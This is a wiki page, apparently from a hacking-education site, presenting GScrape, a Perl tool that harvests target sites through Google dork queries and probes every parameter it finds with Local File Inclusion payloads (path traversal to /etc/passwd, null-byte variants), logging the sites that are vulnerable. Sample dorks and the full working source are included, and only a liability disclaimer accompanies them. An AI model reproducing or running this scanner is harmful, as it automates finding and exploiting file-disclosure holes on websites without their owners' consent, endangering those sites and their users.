Difference between revisions of "GScrape"
From NetSec
(→Source) |
Line 31: | Line 31: | ||
# gscrape.pl | # gscrape.pl | ||
# | # | ||
− | # Uses Google::Search to either iterate through a list of dorks | + | # Uses Google::Search to either iterate through a list of dorks |
# And then prints out a list of vulnerable sites. | # And then prints out a list of vulnerable sites. | ||
Revision as of 01:37, 2 January 2012
Introduction
GScrape is a small Perl script that uses Google's Ajax API (Google::Search on CPAN) to find vulnerable websites.
Example
GScrape is a simple tool. It reads a file, specified by the user, that contains a list of search terms, queries Google with those search terms, and retrieves an array of websites.
These are then tested for a Local File Inclusion vulnerability; any that are found are logged to the output file specified by the user.
perl gscrape.pl -f dork.lst -o gscrape.log
GScrape will not return any results unless your input file actually contains a list of search terms.
Search Terms
These are just some examples of general search terms; they are not guaranteed to find any vulnerabilities.
.php?*= inurl:index.php?page= inurl:include.php?*= index.php?include=
Please note that the search terms in your file DO NOT require "inurl:"; GScrape adds it for you if it isn't there.
Source
#!/usr/bin/perl
# gscrape.pl
#
# Reads search terms from a file, runs each through Google::Search, keeps the
# result URLs that contain "=", requests each kept URL with four fixed path
# strings substituted for the parameter value, and appends any URL whose
# response body contains "root:x:" to the output file.
#
# NOTE(review): there is no "use strict" / "use warnings". %opt, $searchmode
# and $search are never declared with "my", so they are package globals.
# NOTE(review): HTTP::Request is loaded but not referenced directly anywhere
# in this listing.
use Term::ANSIColor;
use Getopt::Std;
use HTTP::Request;
use Google::Search;
use LWP::UserAgent;

# Script-wide state.
my $currentversion = "1.0";
# No agent string is configured here, so requests go out with whatever
# User-Agent LWP::UserAgent uses by default (a libwww-perl/<version> string),
# which is a convenient field to match on in web-server logs.
my $useragent = LWP::UserAgent->new();
my $infile;
my $outfile;
my @url_list;
my @search_terms; # unused at file scope: search_list() declares its own lexical @search_terms
my @dorks; # search terms after the "inurl:" prefix has been ensured

## Main execution: show the banner, parse options, then run the list scan
## only when both -f and -o were given and -h was not.
&banner();
&getOpts();
if ($opt{f} && $opt{o} && !$opt{h}) {
    &printInfo("Trying with the following settings:");
    &printInfo( ">>Search Mode: $searchmode");
    &printInfo( ">>Output file: $outfile");
    &printInfo( ">>Search List: $infile");
    &search_list();
}
# Only a missing -o is reported; a missing -f with -o present falls through
# both conditions and the script ends without a message.
if (!$opt{h} && !$opt{o}){
    &printCritical("YOU MUST SPECIFY AN OUTPUT FILE!1!one!");
    &printInfo("use -h flag for help");
    print"\n\r\nExiting..\n";
}

## Subroutines.
# NOTE(review): every sub below is declared with an empty prototype "()" even
# though several read an argument from @_. The &name(...) call form used
# throughout ignores prototypes.

# search_list: load the terms from $infile, build @dorks, collect candidate
# URLs into @url_list, then probe each candidate and log hits to $outfile.
# Takes no arguments; reads $infile, $outfile and $useragent from file scope.
sub search_list(){
    # Bareword handle FILE, three-argument open. The read handle is not
    # explicitly closed in this sub; FILE is reopened for append further down.
    open FILE, "<", $infile or die $!;
    my @search_terms = <FILE>;   # lines are not chomped
    my $num = @search_terms;
    &printInfo("Loaded $num search terms.");
    &printInfo("Fixing improper search terms [if any]");
    # Runs $num times but indexes with a fresh random number on every pass,
    # so the terms are sampled with replacement rather than visited in order.
    # @search_terms[$random] is a one-element array slice.
    for( my $int = 0; $int < $num; $int++){
        my $random = int(rand($num));
        if ( @search_terms[$random] !~ /inurl:/ ){ # no "inurl:" anywhere in the term: prepend it
            push(@dorks, "inurl:".@search_terms[$random]);
        }
        if ( @search_terms[$random] =~ /inurl:/){ # already has "inurl:": keep the term as is
            push(@dorks, @search_terms[$random]);
        }
    }
    print"\n";
    &printInfo("Retrieving search results..");
    # Query Google::Search once per entry in @dorks and walk the result iterator.
    foreach(@dorks) {
        $search = Google::Search->Web( query => $_ );
        while ( my $result = $search->next ) {
            if( $result->uri =~ /\=/) { # keep only result URIs that contain "=" (i.e. carry a parameter)
                push(@url_list, $result->uri); # remember the candidate
                &printInfo(">>".$result->uri);
            }
        }
    }
    # The four fixed probe strings. For defenders: every request this script
    # sends ends in one of these values, so repeated "../" sequences,
    # "/etc/passwd" and a trailing "%00" in a query parameter are the log and
    # WAF signatures to look for.
    my @lfitest = ( '/etc/passwd%00', '/etc/passwd', '../../../../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../../../etc/passwd%00');
    my $lfinum = @lfitest;
    print"\n";
    &printInfo("Testing sites for vulnerabilities..");
    # One pass per collected URL, but the URL actually used is picked at
    # random from @url_list on each pass (the loop variable $_ is not the URL
    # that gets requested).
    foreach( @url_list ){
        my $index = @url_list;
        my $randint = int(rand($index));
        my $x = @url_list[$randint];
        $x =~ s/=.*/=/ ; # cut everything after the first "=", leaving only the first parameter name
        for (my $i = 0; $i < $lfinum; $i++){
            # Unanchored test: "http://" is prepended unless the string
            # already contains "http://" somewhere.
            if ( $x !~ /http:\/\// ){ $x = "http://".$x; }
            my $request = $useragent->get($x.@lfitest[$i]); # $request actually holds the response object returned by get()
            my $result = $request->content;
            # A hit is decided solely by "root:x:" (case-insensitive) appearing
            # in the response body; nothing else about the response is checked.
            if ($result =~ m/root:x:/i){
                &printVuln(">>> ".$x.@lfitest[$i]);
                open FILE, ">>", $outfile or die $!;
                print FILE "[VULN] >> ".$x.@lfitest[$i]."\n";
                close FILE;
                last; # stop probing this URL after the first hit
            }
            # Looks for block-page wording. Only m/hacking/i is bound to
            # $result; the other three patterns have no binding and so match
            # against $_ (the outer foreach's current URL).
            if ($result =~ m/hacking/i || m/reported/i || m/recorded/i || m/malicious/i){
                &printCritical("> Whoops! Tripped an IDS at: ".$x." With: ".@lfitest[$i]);
            }
        }
    }
}

# banner: clear the terminal (fixed command string, no user input involved),
# print the ASCII-art banner with the version, then the liability warning.
sub banner() {
    system('clear');
    print("\r+=====================================================================+ \r| GScrape | \r| ________ _________ | \r| / _____/ / _____/ ________________ ______ ____ | \r| / \\ ___ \\_____ \\_/ ___\\_ __ \\__ \\ \\____ \\_/ __ \\ | \r| \\ \\_\\ \\/ \\ \\___| | \\// __ \\| |_> > ___/ | \r| \\______ /_______ /\\___ >__| (____ / __/ \\___ > | \r| \\/ \\/ \\/ \\/|__| \\/ | \r| | \r| | \r| Uses Google AJAX API to search for vulnerabilities | \r+=====================================================================+ \r \r www.BlackhatAcademy.org \r v+$currentversion " );
    printWarning("THE END USER IS LIABLE FOR THE USE OF THIS SOFTWARE. 
\rUSING THIS AGAINST ANY SYSTEM WITHOUT PERMISSION IS A CRIMINAL ACT \rTHE AUTHOR TAKES NO RESPONSIBILITY FOR THE END-USER'S ACTIONS.\n");
}

# getOpts: parse -f <file>, -o <file> and -h into the global %opt, copy the
# values into $infile / $outfile, and print the help text when -h is present.
sub getOpts(){
    # Option spec: f and o take a value, h is a flag.
    my $opt_string = 'f:o:h';
    getopts( "$opt_string", \%opt );
    # Copy the option values into the file-scope variables when present.
    if ($opt{o}){ $outfile = $opt{o}; }
    if ($opt{f}){ $infile = $opt{f}; $searchmode = "list"; }
    # Show the help page for -h.
    usage() if $opt{h};
}

# usage: print the help text.
sub usage(){ print(" GScrape Usage: Search using a list of search terms: -f /path/to/dorks.txt Define output file: -o results.out Example Usages: Run a list of search terms through the scanner: perl gscrape.pl -f ~/Dork.lst -o ~/result.out "); }

# Coloured console output (Term::ANSIColor): each helper prints a bracketed
# tag followed by the message passed as its first argument and a newline.

# printCritical: "[CRITICAL] <message>". The colour is switched to red and
# then immediately reset, so the message text itself is printed after a reset.
sub printCritical(){
    my $error = shift(@_);
    print color 'bold blue';
    print "\r[";
    print color 'red';
    print "CRITICAL";
    print color 'bold blue';
    print "] ";
    print color 'red';
    print color 'reset';
    print $error."\n";
}

# printWarning: "[WARNING] <message>" with the tag in yellow.
sub printWarning(){
    my $error = shift(@_);
    print color 'bold blue';
    print "\r[";
    print color 'yellow';
    print "WARNING";
    print color 'bold blue';
    print "] ";
    print color 'reset';
    print $error."\n";
}

# printInfo: "[INFO] <message>" with the tag printed after a colour reset.
sub printInfo(){
    my $info = shift(@_);
    print color 'bold blue';
    print "\r[";
    print color 'reset';
    print "INFO";
    print color 'bold blue';
    print "] ";
    print color 'reset';
    print $info."\n";
}

# printVuln: "[VULN] <message>" with the tag in green.
sub printVuln(){
    my $info = shift(@_);
    print color 'bold blue';
    print "\r[";
    print color 'green';
    print "VULN";
    print color 'bold blue';
    print "] ";
    print color 'reset';
    print $info."\n";
}